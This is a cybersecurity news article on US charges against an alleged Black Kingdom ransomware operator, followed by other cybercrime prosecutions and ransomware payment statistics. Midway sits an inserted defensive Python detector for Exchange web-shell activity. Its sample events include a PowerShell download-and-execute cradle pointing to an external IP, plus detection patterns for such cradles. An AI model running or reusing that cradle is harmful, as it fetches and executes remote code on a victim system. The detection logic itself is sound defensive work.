The US Department of Justice (DOJ) on Thursday announced charges against a 36-year-old Yemeni national for allegedly deploying Black Kingdom ransomware against targets worldwide, including businesses, schools and hospitals in the US.
Rami Khaled Ahmed of Sana'a, Yemen, was charged with one count of conspiracy, one count of intentional damage to a protected computer, and one count of threatening to damage a protected computer. Ahmed is believed to be currently residing in Yemen.
"From March 2021 to June 2023, Ahmed and others infected the computer networks of several victims in the US, including a medical billing services company in Encino, a ski resort in Oregon, a school district in Pennsylvania, and a health clinic in Wisconsin," the DOJ said in a statement.
Ahmed is accused of developing and deploying the ransomware by exploiting a vulnerability in Microsoft Exchange Server known as ProxyLogon.
The ransomware worked either by encrypting data on the victims' computer networks or by claiming to have stolen the information from those networks. After encryption, the ransomware dropped a ransom note on the system instructing the victim to send $10,000 worth of Bitcoin to a cryptocurrency address controlled by a co-conspirator.
The victims were also allegedly asked to send proof of payment to a Black Kingdom email address. The ransomware is estimated to have affected about 1,500 computer systems in the US and elsewhere.
Also tracked under the name Pydomer, the ransomware family had previously been associated with attacks exploiting Pulse Secure VPN vulnerabilities (CVE-2019-11510). Microsoft disclosed at the end of March 2021 that it was the first known ransomware family to take advantage of the ProxyLogon flaws.
Security vendor Sophos described Black Kingdom as "somewhat rudimentary and amateurish in its composition", noting that the attackers exploited the ProxyLogon vulnerability to deploy web shells, which were then used to issue PowerShell commands to download the ransomware.
It also stated that the activity bore all the hallmarks of a "motivated script kiddie". Later that August, a Nigerian threat actor was observed attempting to recruit employees by offering to pay them $1 million in Bitcoin to deploy Black Kingdom ransomware on their companies' networks as part of an insider threat scheme.
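The chain Sophos describes (an Exchange web shell issuing PowerShell commands to fetch the ransomware) leaves a process-lineage signal that defenders can hunt for. The following is an added illustration, not code from the article or from Sophos; the worker process names, the download-command patterns and the tab-separated process-creation events are constructed assumptions.

```python
import re
from dataclasses import dataclass

# Constructed sample process-creation events (not real telemetry):
# parent process, child process, command line; one event per line, tab-separated.
SAMPLE_EVENTS = """\
w3wp.exe\tpowershell.exe\tpowershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/k.ps1')
w3wp.exe\tcmd.exe\tcmd /c whoami
w3wp.exe\tpowershell.exe\tpowershell -enc SQBFAFgA
svchost.exe\tpowershell.exe\tpowershell -c Get-Process
explorer.exe\tpowershell.exe\tpowershell -c Invoke-WebRequest https://example.test/update.ps1
"""

# Assumed IIS/Exchange worker processes that should not normally spawn shells.
WEB_WORKERS = {"w3wp.exe", "umworkerprocess.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# Assumed indicators of a download cradle or an encoded command.
DOWNLOAD_PATTERNS = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b"
    r"|net\.webclient|-enc(odedcommand)?\b",
    re.IGNORECASE,
)


@dataclass
class Finding:
    parent: str
    child: str
    severity: str
    reason: str


def analyze(events: str) -> list[Finding]:
    """Flag shells spawned by web worker processes; escalate when the
    command line looks like a download cradle or an encoded command."""
    findings = []
    for line in events.splitlines():
        parent, child, cmdline = line.split("\t", 2)
        if parent.lower() in WEB_WORKERS and child.lower() in SHELLS:
            if DOWNLOAD_PATTERNS.search(cmdline):
                findings.append(Finding(parent, child, "high",
                                        "web worker spawned shell with download/encoded command"))
            else:
                findings.append(Finding(parent, child, "medium",
                                        "web worker spawned shell"))
    return findings
```

In production this logic would run over Sysmon event ID 1 or EDR process-creation telemetry rather than an embedded string, and the medium-severity case still warrants review because any shell under the Exchange worker is abnormal.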
If convicted, Ahmed faces a maximum sentence of five years in federal prison for each count. The case is being investigated by the US Federal Bureau of Investigation (FBI) with assistance from New Zealand Police.
The charges come against the backdrop of several other developments:
- The DOJ unsealed an indictment accusing Ukrainian citizen Artem Stryzhak of attacking companies using Nefilim ransomware after becoming an affiliate in June 2021. He was arrested in Spain in June 2024 and extradited to the US on April 30, 2025. If convicted, he faces up to five years in prison.
- Tyler Robert Buchanan, a British national suspected of being a member of Scattered Spider, was extradited from Spain to the United States to face charges related to wire fraud and aggravated identity theft. Buchanan was arrested in Spain in June 2024, and charges against him and other Scattered Spider members were announced by the US in November 2024.
- Leonidas Varagiannis (aka War), 21, and Prasan Nepal (aka Trip), 20, two alleged leaders of the child extortion group 764, were arrested and charged with directing and distributing child sexual abuse material (CSAM). Both men are accused of exploiting at least eight minor victims.
- Richard Anthony Reyna Densmore, another 764 member, was sentenced to 30 years in prison in the US in November 2024 for the sexual exploitation of a child. 764 is part of The Com, a sprawling collection of loosely connected groups that commit financially motivated, sexual and violent crimes. It also includes Scattered Spider.
- The US Financial Crimes Enforcement Network (FinCEN) designated the Cambodia-based conglomerate Huione Group as a "primary money laundering concern" for transnational cybercrime gangs in Southeast Asia running romance baiting scams, and for serving as a critical node for laundering the proceeds of cyber heists conducted by the Democratic People's Republic of Korea (DPRK). Huione Pay's banking license was revoked in March 2025 by the National Bank of Cambodia.
Ransomware attacks rise as payments fall
The developments come as ransomware continues to be a persistent threat, although an increasingly fragile and volatile one, as sustained law enforcement action drives significant shifts in observed tactics. These include a growing frequency of attacks without encryption and a tendency for cybercriminals to move away from traditional hierarchical groups in favour of a lone-wolf approach.
"Ransomware operations are becoming more decentralized, with an increasing number of former affiliates choosing to operate independently rather than remaining tied to established groups," Halcyon said.
"This shift is driven by several factors, including strengthened law enforcement coordination, successful large-scale takedowns of ransomware infrastructure, and a broader push by actors to avoid attribution through brand rotation or unaffiliated operations."
Data compiled by Verizon shows that 44% of all breaches analyzed in 2024 involved ransomware, up from 32% in 2023. But there is good news: more victims than ever are refusing to pay the ransom, and fewer organizations are willing to pay at all.
"In calendar year 2024, the average payment was $115,000, down from $150,000 the previous year," Verizon said in its 2025 Data Breach Investigations Report (DBIR). "64% of victim organizations did not pay the ransom, up from 50% two years ago."
According to Coveware, the average payment in Q1 2025 was $552,777, a 0.2% change from the previous quarter. The median, meanwhile, rose by $80 to $200,000.
"The rate of companies that decided to pay a ransom, either to purchase decryption keys or to suppress the threat actor from posting stolen data on a leak site, rose slightly in Q1 2025," the company said.
The ransomware payment rate during the period was 27%, compared to 85% in Q1 2019, 73% in Q1 2020, 56% in Q1 2021, 46% in Q1 2022, 45% in Q1 2023 and 28% in Q1 2024.
"While attacks are certainly still happening, and new groups continue to emerge every month, the well-oiled ransomware machine built by the early RaaS groups is suffering from complications that seem unlikely to be resolved," it added.
Despite these setbacks, ransomware shows no sign of stopping any time soon, with Q1 2025 seeing 2,289 recorded incidents, a 126% increase over Q1 2024, per Check Point. However, ransomware attacks witnessed a 32% month-over-month decline in March 2025, with a total of 600 claimed incidents.
North America and Europe accounted for more than 80% of cases. Consumer goods and services, business services, industrial manufacturing, healthcare, and construction and engineering were the sectors most targeted by ransomware.
"The volume of ransomware incidents is reaching unprecedented levels," said Dr. Darren Williams, founder and CEO of BlackFog. "This is a persistent problem for organizations contending with attackers focused on breaches, theft and extortion. Different groups will emerge and flourish, but all of them are focused on one ultimate goal: exfiltrating data."